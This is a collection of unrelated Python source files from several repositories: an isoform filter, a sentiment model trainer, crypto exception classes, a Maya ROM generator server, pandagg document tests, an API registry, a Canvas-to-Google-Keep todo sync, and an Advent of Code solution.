input_gpd_file = open(input_gpd_filename, 'r')
output_gpd_file = open(output_gpd_filename, 'w')
print isoforms_names_ls
for line in input_gpd_file:
fields = line.split()
if ((fields[1][:-2]) in isoforms_names_ls):
output_gpd_file.write(line)
input_gpd_file.close()
output_gpd_file.close()
### Main
##########
def main():
fusion_parseSAM_filename = sys.argv[1]
selected_fusion_isoforms_filename = sys.argv[2]
input_parseSAM_filename = sys.argv[3]
output_parseSAM_filename = sys.argv[4]
input_gpd_filename = sys.argv[5]
output_gpd_filename = sys.argv[6]
[MLE_input_dict, isoforms_names_ls, num_reads] = get_fusion_genomes(fusion_parseSAM_filename, selected_fusion_isoforms_filename)
print_MLE_input_file(input_parseSAM_filename, output_parseSAM_filename, selected_fusion_isoforms_filename,
MLE_input_dict, num_reads)
print_predicted_gpd_file(input_gpd_filename, output_gpd_filename, isoforms_names_ls)
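# Example invocation (hypothetical file names; the positional order mirrors the
# sys.argv parsing in main() above):
#   python generate_isoforms_fusion_FDR.py fusion_parseSAM.txt \
#       selected_fusion_isoforms.txt input_parseSAM.txt output_parseSAM.txt \
#       input_predicted.gpd output_predicted.gpd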
if __name__ == '__main__':
main()
| 5,611 |
src/mains/main.py
|
MohamedAli1995/Virgin-Airline-Tweets-Sentiment-Prediction
| 1 |
2172448
|
import tensorflow as tf
from src.data_loader.data_generator import DataGenerator
from src.models.sentiment_model import SentimentModel
from src.trainers.sentiment_trainer import SentimentTrainer
from src.testers.sentiment_tester import SentimentTester
from src.utils.config import processing_config
from src.utils.logger import Logger
from src.utils.utils import get_args
from src.utils.utils import print_predictions
def main():
args = None
config = None
try:
# args = get_args()
# config = processing_config(args.config)
config = processing_config(
"/media/syrix/programms/projects/Virgin-Airline-Tweets-Sentiment-Prediction/configs/config_model.json")
except:
print("Missing or invalid arguments")
exit(0)
sess = tf.Session()
logger = Logger(sess, config)
model = SentimentModel(config)
model.load(sess)
# if args.input_text is not None:
# data = DataGenerator(config, training=False)
# data.load_test_set([args.input_text])
# tester = SentimentTester(sess, model, data, config, logger)
# predictions = tester.predict()
# print_predictions(predictions)
# return
data = DataGenerator(config, training=True)
trainer = SentimentTrainer(sess, model, data, config, logger)
trainer.train()
tester = SentimentTester(sess, model, data, config, logger)
tester.test()
if __name__ == '__main__':
main()
| 1,464 |
pyqlc/utils/exceptions.py
|
realForbis/pyqlc
| 0 |
2172171
|
from ed25519_blake2b import BadSignatureError
__all__ = (
"InvalidPrivateKey", "InvalidSeed", "InvalidAccount", "InvalidPublicKey",
"BadSignatureError", "InvalidQLCAddress", "InvalidSignature", "InvalidBlock",
"InvalidWork", "InvalidDifficulty", "InvalidMultiplier", "InvalidBlockHash",
"InvalidBalance"
)
class InvalidPrivateKey(ValueError):
"""The QLC private key is invalid."""
class InvalidQLCAddress(ValueError):
"""The QLC adress is invalid."""
class InvalidSeed(ValueError):
"""The seed is invalid."""
class InvalidAccount(ValueError):
"""The QLC account ID is invalid."""
class InvalidPublicKey(ValueError):
""""The QLC public key is invalid."""
class InvalidSignature(BadSignatureError):
"""The given signature is invalid."""
class InvalidBlock(ValueError):
"""The block is invalid."""
class InvalidWork(ValueError):
"""The given work is invalid."""
class InvalidDifficulty(ValueError):
"""The given work difficulty is invalid."""
class InvalidMultiplier(ValueError):
"""The given work multiplier is invalid."""
class InvalidBlockHash(ValueError):
"""The given block hash is invalid."""
class InvalidBalance(ValueError):
"""The given balance is invalid."""
| 1,242 |
tpRigToolkit/tools/romgenerator/dccs/maya/server.py
|
tpRigToolkit/tpRigToolkit-tools-romgenerator
| 0 |
2172802
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains tpRigToolkit-tools-romgenerator server implementation for Maya
"""
import maya.cmds
from tpDcc import dcc
from tpDcc.core import server
class RomGeneratorServer(server.DccServer, object):
PORT = 45322
def get_scene_joints(self, data, reply):
long_joints = dcc.list_nodes(node_type='joint', full_path=True)
short_joints = [dcc.node_short_name(joint) for joint in long_joints]
joints_uuids = [dcc.node_handle(joint) for joint in long_joints]
reply['result'] = {'names': short_joints, 'handles': joints_uuids}
reply['success'] = True
def get_selected_joints(self, data, reply):
long_joints = dcc.selected_nodes_of_type(node_type='joint', full_path=True)
joints_uuids = [dcc.node_handle(joint) for joint in long_joints]
reply['result'] = joints_uuids
reply['success'] = True
@dcc.undo_decorator()
def generate_rom(self, data, reply):
rom_data = data.get('rom_data', dict())
if not rom_data:
reply['success'] = False
reply['msg'] = 'No ROM data given'
return
try:
joint_handles = rom_data['joint_handles']
rotate_x = rom_data['rotate_x']
rotate_y = rom_data['rotate_y']
rotate_z = rom_data['rotate_z']
solve_as_one_item = rom_data['solve_as_one_item']
frame_interval = rom_data['frame_interval']
start_frame = rom_data['start_frame']
anim_length = rom_data['anim_length']
except Exception as exc:
reply['success'] = False
reply['msg'] = 'ROM data is not valid: {}'.format(exc)
return
# retrieve joints from UUIDs
joints = [dcc.find_node_by_id(joint_id, full_path=True) for joint_id in joint_handles]
joints = [joint for joint in joints if joint and dcc.node_exists(joint)]
        # set timeline range
        dcc.set_active_frame_range(0, start_frame + anim_length)
        # wipe existing keys
        maya.cmds.cutKey(joints, time=(-100, anim_length * 10), option='keys')
maya.cmds.setKeyframe(joints, t=start_frame)
time = start_frame
if solve_as_one_item:
rotation_values = (0, 30, -30, 0)
if rotate_x:
for value in rotation_values:
maya.cmds.currentTime(time)
for joint in joints:
for axis in 'XYZ':
rotation_value = value if axis == 'X' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_y:
for value in rotation_values:
maya.cmds.currentTime(time)
for joint in joints:
for axis in 'XYZ':
rotation_value = value if axis == 'Y' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_z:
for value in rotation_values:
maya.cmds.currentTime(time)
for joint in joints:
for axis in 'XYZ':
rotation_value = value if axis == 'Z' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
else:
rotation_values = (0, 90, -90, 0)
if rotate_x:
for joint in joints:
for value in rotation_values:
maya.cmds.currentTime(time)
for axis in 'XYZ':
rotation_value = value if axis == 'X' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_y:
for joint in joints:
for value in rotation_values:
maya.cmds.currentTime(time)
for axis in 'XYZ':
rotation_value = value if axis == 'Y' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_z:
for joint in joints:
for value in rotation_values:
maya.cmds.currentTime(time)
for axis in 'XYZ':
rotation_value = value if axis == 'Z' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
reply['success'] = True
def clear_rom(self, data, reply):
joint_handles = data.get('joint_handles', list())
if not joint_handles:
reply['success'] = False
reply['msg'] = 'No joint selected to clear ROM data from'
return
# retrieve joints from UUIDs
joints = [dcc.find_node_by_id(joint_id, full_path=True) for joint_id in joint_handles]
joints = [joint for joint in joints if joint and dcc.node_exists(joint)]
maya.cmds.currentTime(0)
maya.cmds.cutKey(joints, time=(-10000, 10000), option="keys")
reply['success'] = True
| 6,058 |
tests/test_document.py
|
alkemics/panda
| 13 |
2172338
|
import pytest
from pandagg import Mappings
from pandagg.document import InnerDocSource, DocumentSource
from pandagg.mappings import Text, Long, Date, Keyword, Object, Nested
from pandagg.node.mappings import Boolean
class User(InnerDocSource):
id: int = Long(required=True)
signed_up: str = Date()
username: str = Text(fields={"keyword": Keyword()}, required=True, multiple=False)
email = Text(fields={"keyword": Keyword()})
location = Text(fields={"keyword": Keyword()})
class Comment(InnerDocSource):
author = Object(properties=User, required=True)
created = Date(required=True)
content = Text(required=True)
class Post(DocumentSource):
author = Object(properties=User, required=True)
created = Date(required=True)
body = Text(required=True)
comments = Nested(properties=Comment, multiple=True)
def test_document_init():
user = User(id=1, signed_up="2021-01-01")
assert user.id == 1
assert user.signed_up == "2021-01-01"
assert isinstance(user._mappings_, Mappings)
assert user._mappings_.to_dict() == {
"properties": {
"email": {"fields": {"keyword": {"type": "keyword"}}, "type": "text"},
"id": {"type": "long"},
"location": {"fields": {"keyword": {"type": "keyword"}}, "type": "text"},
"signed_up": {"type": "date"},
"username": {"fields": {"keyword": {"type": "keyword"}}, "type": "text"},
}
}
assert list(user._field_attrs_.keys()) == [
"id",
"signed_up",
"username",
"email",
"location",
]
with pytest.raises(TypeError) as e:
User(fake_field=1)
assert e.value.args == (
"'fake_field' is an invalid keyword argument for <class 'tests.test_document.User'>",
)
def test_pre_save(write_client):
class AutoDatePost(DocumentSource):
author = Object(properties=User, required=True)
updated = Date(required=True)
body = Text(required=True)
comments = Nested(properties=Comment, multiple=True)
def _pre_save_op_(self):
if self.updated is None:
# TODO - handle datetime serialization
self.updated = "2021-01-01"
post = AutoDatePost(author=User(id=1, username="paul"), body="knock knock")
post._pre_save_op_()
assert post.updated == "2021-01-01"
def test_post_init(write_client):
class AutoArchivedPost(DocumentSource):
updated = Date(required=True)
archived = Boolean()
def _post_init_(self) -> None:
# automatically archive post that hasn't been updated in a while
if self.updated and self.updated < "2020":
self.archived = True
post = AutoArchivedPost(archived=False)
assert post.archived is False
post = AutoArchivedPost(updated="1920", archived=False)
assert post.archived is True
def test_nested_document_to_dict():
paul = User(id=1, username="paul")
chani = User(id=2, username="chani")
post = Post(
author=paul,
body="knock knock",
comments=[
Comment(author=chani, content="who's there?"),
Comment(author=paul, content="it's me"),
],
)
assert post._to_dict_() == {
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{"author": {"id": 2, "username": "chani"}, "content": "who's there?"},
{"author": {"id": 1, "username": "paul"}, "content": "it's me"},
],
}
def test_doc_deserialization():
post = Post._from_dict_(
{
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{"author": {"id": 2, "username": "chani"}, "content": "who's there?"},
{"author": {"id": 1, "username": "paul"}, "content": "it's me"},
],
}
)
assert isinstance(post.author, User)
assert post.author.id == 1
assert post.author.username == "paul"
assert post.body == "knock knock"
assert len(post.comments) == 2
assert post.comments[0].author.id == 2
assert post.comments[0].author.username == "chani"
assert post.comments[0].content == "who's there?"
assert post.comments[1].author.id == 1
assert post.comments[1].author.username == "paul"
assert post.comments[1].content == "it's me"
# strict fails
with pytest.raises(TypeError) as e:
Post._from_dict_(
{
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{
"author": {"id": 2, "username": "chani"},
"content": "who's there?",
},
{
"author": {"id": 1, "username": ["paul", "paulo"]},
"content": "it's me",
},
],
}
)
assert e.value.args == (
"Unexpected list for field comments.author.username, got ['paul', 'paulo']",
)
# not strict is ok
post = Post._from_dict_(
{
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{"author": {"id": 2, "username": "chani"}, "content": "who's there?"},
{
"author": {"id": 1, "username": ["paul", "paulo"]},
"content": "it's me",
},
],
},
strict=False,
)
assert post.comments[1].author.username == ["paul", "paulo"]
def test_nested_document_to_dict_empty_multiple():
# with empty 'multiple' field: -> [] instead of None
post = Post(author=User(id=1, username="paul"), body="knock knock")
assert post.comments == []
assert post._to_dict_(with_empty_keys=True) == {
"author": {
"email": None,
"id": 1,
"location": None,
"signed_up": None,
"username": "paul",
},
"body": "knock knock",
"comments": [],
"created": None,
}
def test_document_to_dict():
user = User(id=1, signed_up="2021-01-01")
assert user._to_dict_() == {"id": 1, "signed_up": "2021-01-01"}
assert user._to_dict_(with_empty_keys=True) == {
"email": None,
"id": 1,
"location": None,
"signed_up": "2021-01-01",
"username": None,
}
| 6,537 |
biothings_explorer/_deprecated_registry.py
|
luluricketts/biothings_explorer
| 21 |
2173099
|
# -*- coding: utf-8 -*-
"""
Storing metadata information and connectivity of APIs.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from copy import deepcopy
import networkx as nx
from ._deprecated_mapping_parser import MappingParser
from .config import metadata
from .utils.simple_semmed import semmed
from .utils.cord import cord, SEMANTIC_TYPE_ID_MAPPING
from pathlib import Path
CURRENT_PATH = Path(__file__)
class Registry():
"""Convert metadata information of APIs into a networkx graph."""
def __init__(self):
"""Initialize networkx graph and load biothings apis."""
self.G = nx.MultiDiGraph()
self.registry = {}
# self.load_biothings()
self.all_edges_info = self.G.edges(data=True)
self.all_labels = {d[-1]['label'] for d in self.all_edges_info}
self.all_inputs = {d[-1]['input_type'] for d in self.all_edges_info}
self.all_outputs = {d[-1]['output_type'] for d in self.all_edges_info}
@staticmethod
def _auto_generate_cord_mapping(doc_type):
"""Auto-generate schema mapping file for all CORD APIs
:param: doc_type: the document type of the specific cord API
"""
res = {
"@context": "http://schema.org",
"@type": doc_type
}
for id_type in SEMANTIC_TYPE_ID_MAPPING[doc_type]:
res[id_type.lower()] = id_type.lower()
for pred, output_types in cord[doc_type].items():
res[pred] = []
for output_type in output_types:
tmp = {
"@type": output_type,
"$source": "CORD",
"pmd": "associated_with.pmc",
}
for input_id_type in SEMANTIC_TYPE_ID_MAPPING[doc_type]:
for output_id_type in SEMANTIC_TYPE_ID_MAPPING[output_type]:
tmp[output_id_type.lower()] = "associated_with." + output_id_type.lower()
tmp["$input"] = input_id_type.lower()
res[pred].append(tmp)
return res
@staticmethod
def _auto_generate_semmed_operation_list(doc_type):
res = []
for pred, output_types in semmed[doc_type].items():
for output_type in output_types:
_id = '-'.join([doc_type, pred, output_type])
res.append({'$ref': "#/components/x-bte-kgs-operations/" + _id})
return res
@staticmethod
def _auto_generate_semmed_operation(doc_type):
x_operation_template = {
"inputSeparator": ",",
"inputs": [
{
"id": "UMLS"
}
],
"method": "post",
"source": "SEMMED",
"outputs": [
{
"id": "UMLS"
}
],
"parameters": {
"fields": ""
},
"path": "/query",
"requestBody": {
"body": {
"q": "{inputs[0]}",
"scopes": "umls"
}
},
"supportBatch": True,
"response_mapping": {
"$ref": ""
}
}
res = {}
for pred, output_types in semmed[doc_type].items():
for output_type in output_types:
_id = '-'.join([doc_type, pred, output_type])
tmp = deepcopy(x_operation_template)
tmp['parameters']['fields'] = pred
tmp['inputs'][0]['semantic'] = doc_type
tmp['outputs'][0]['semantic'] = output_type
tmp['predicate'] = pred
tmp['response_mapping']["$ref"] = '#/components/x-bte-response-mapping/' + _id
res[_id] = [tmp]
return res
@staticmethod
def _auto_generate_semmed_mapping(doc_type):
"""Auto-generate schema mapping file for all SEMMED APIs
:param: doc_type: the document type of the specific semmed API
"""
result = {}
for pred, output_types in semmed[doc_type].items():
for output_type in output_types:
_id = '-'.join([doc_type, pred, output_type])
result[_id] = {
"umls": pred + '.umls',
"pmid": pred + '.pmid',
}
return result
def load_biothings(self):
"""Load biothings API into registry network graph."""
# load biothings schema
self.mp = MappingParser()
# loop through API metadata
for _api, _info in metadata.items():
# use the mapping parser module to load relationship of each API
# into the network
if _info.get('api_name') == 'CORD API':
mapping_file = self._auto_generate_cord_mapping(_info.get('doc_type'))
elif _info.get('api_name') == 'SEMMED API':
mapping_file = self._auto_generate_semmed_mapping(_info.get('doc_type'))
elif 'mapping_url' in _info:
self.registry[_api] = {}
mapping_file = Path.joinpath(CURRENT_PATH.parent,
'smartapi/schema', _api + '.json')
else:
continue
self.mp.load_mapping(mapping_file, api=_api)
self.registry[_api] = {
'mapping': self.mp.mapping,
'graph': self.mp.connect(),
'type': self.mp.type
}
self.G.add_edges_from(self.registry[_api]['graph'].edges(data=True))
return self.G
def filter_edges(self, input_cls=None, output_cls=None, edge_label=None):
"""
Filter edges based on input, output and label.
The relationship between bio-entities is represented as a networkx MultiDiGraph \
in BioThings explorer. This function helps you filter for the relationships of your interest based on input/output/edge info.
:param: input_cls (str|list|None) : the semantic type(s) of the input.
Optional
:param: output_cls (str|list|None) : the semantic type(s) of the output.
Optional
:param: edge_label (str|list|None) : the relationship between input and output.
"""
if edge_label:
if isinstance(edge_label, str):
edge_label = [edge_label]
# if no edge label is specified, set it as all labels
else:
edge_label = self.all_labels
# if no input_cls is specified, set it as all input types
if not input_cls:
input_cls = self.all_inputs
# if input_cls is str, convert it to list of one element
elif isinstance(input_cls, str):
input_cls = [input_cls]
# if no output_cls is specified, set it as all output types
if not output_cls:
output_cls = self.all_outputs
elif isinstance(output_cls, str):
output_cls = [output_cls]
return [d for u,v,d in self.all_edges_info if d['input_type'] in input_cls and d['output_type'] in output_cls and d['label'] in edge_label]
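# Illustrative usage sketch (the semantic types and predicate below are examples
# and may not exist in the loaded metadata). Note that all_labels/all_inputs/
# all_outputs are cached in __init__ before load_biothings() runs, so pass the
# filters explicitly when the graph is populated afterwards:
#
#   reg = Registry()
#   reg.load_biothings()
#   edges = reg.filter_edges(input_cls="Gene",
#                            output_cls="ChemicalSubstance",
#                            edge_label="physically_interacts_with")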
| 7,189 |
canvas_todo/canvas_todo.py
|
ryansingman/canvas-todo
| 0 |
2171204
|
import threading
import collections
from typing import Any, Dict, List
from time import sleep
import keyring
from canvasapi import Canvas
from canvasapi.course import Course
from colored import fore, style
from .todo import GKeep, Task, Completed, Update
from .assignments import get_assignments
from .utils import get_courses_from_ids
from .config import get_app_config, get_canvas_config, get_gkeep_config
class CanvasTodo(threading.Thread):
"""CanvasTodo main class
"""
canvas_conf: Dict[str, Any]
app_conf: Dict[str, Any]
gkeep_conf: Dict[str, Any]
canv: Canvas
todo: GKeep
    courses: List[Course]
def __init__(self):
"""Initializes CanvasTodo class
"""
# init thread
super().__init__()
# get canvas conf
self.canvas_conf = get_canvas_config()
# get app conf
self.app_conf = get_app_config()
# get gkeep conf
self.gkeep_conf = get_gkeep_config()
# create canvas obj
self.canv = Canvas(
self.canvas_conf["api_url"],
keyring.get_password('canvas-token', self.canvas_conf["api_username"])
)
# create todo obj (gkeep)
self.todo = GKeep(self.gkeep_conf)
# get user
self.user = self.canv.get_current_user()
# get list of courses
self.courses = get_courses_from_ids(self.canv, self.app_conf["classes"])
def run(self):
"""Runs CanvasTodo thread
Get assignments, (maybe) prints to console, (tbd) updates todo list on google keep
"""
# inf run loop
while True:
# get updated canvas tasks
canvas_tasks = get_assignments(
self.courses, self.user, **self.app_conf["assignments_conf"]
)
# print assignments
if self.app_conf["console_print"]:
self.print_assignments(canvas_tasks)
# get todo state
todo_dict = self.todo.request_todo_state(self.app_conf["classes"])
# generate dictionary of updates to todo state with assignments
update_dict = self.gen_update_todo_dict(todo_dict, canvas_tasks)
# set todo state
self.todo.post_todo_state(update_dict, self.app_conf["classes"])
# sleep for <update_rate> minutes
sleep(self.app_conf["update_rate"])
@staticmethod
    def print_assignments(assignments: Dict[Course, List[Task]]):
        """Pretty prints assignments for each course
        Parameters
        ----------
        assignments : Dict[Course, List[Task]]
            assignments to print
        """
        for course, course_assignments in assignments.items():
print(f"{fore.GREEN}{style.BOLD}{course.name}:{style.RESET}")
# print each assignment
for assmnt in course_assignments:
print(" " + str(assmnt))
@staticmethod
def gen_update_todo_dict(
todo_dict: Dict[int, List[Task]], canvas_tasks: Dict[Course, List[Task]]
) -> Dict[int, Dict[Update, List[Any]]]:
"""Generates update dictionary consisting of change to make to todo
Parameters
----------
todo_dict : Dict[int, List[Task]]
todo dictionary, contains state from todo app, keyed by course id
canvas_tasks : Dict[Course, List[Task]]
tasks dictionary from canvas, keyed by Course object
Returns
-------
Dict[int, Dict[Update, List[Any]]]
update dictionary, keyed by course ID
"""
# init update dict
update_dict = collections.defaultdict(lambda: collections.defaultdict(list))
# iterate over courses
for course, course_canv_tasks in canvas_tasks.items():
# get todo tasks for course
todo_tasks = todo_dict[course.id]
# iterate over canvas tasks
for canv_task in course_canv_tasks:
# check if task exists in todo tasks
if not canv_task in todo_tasks:
# check if same task exists, but is marked incomplete in todo
if (
(canv_task.name, canv_task.due_date) in
[(t.name, t.due_date) for t in todo_tasks]
):
# mark task as complete in todo if complete in canvas
if canv_task.completed == Completed.COMPLETE:
update_dict[course.id][Update.MARK_COMPLETE].append(canv_task)
else:
# if task does not exist at all in todo, add it
update_dict[course.id][Update.ADD].append(canv_task)
# return update dict
return update_dict
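if __name__ == "__main__":
    # Minimal entry-point sketch (an assumption; the package may provide its own
    # launcher). CanvasTodo subclasses threading.Thread, so start() kicks off the
    # polling loop implemented in run().
    CanvasTodo().start()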
| 4,820 |
day07/main.py
|
OliElli/aoc2021
| 0 |
2173194
|
#!/usr/bin/env python3
from statistics import median, mean
# pt1
input = [int(x) for x in [l for l in open("input.txt", "r")][0].split(',')]
print(round(sum([abs(x - median(input)) for x in input])))
# pt2
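# Moving a crab f positions costs 1 + 2 + ... + f = f * (f + 1) / 2 fuel (a move
# of 4 costs 10). The optimum sits near the mean; rounding mean - 1 is a shortcut
# that works for this input rather than a general guarantee.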
print(round(sum([f * (f + 1) / 2 for f in [abs(x - round(mean(input) - 1)) for x in input]])))
| 304 |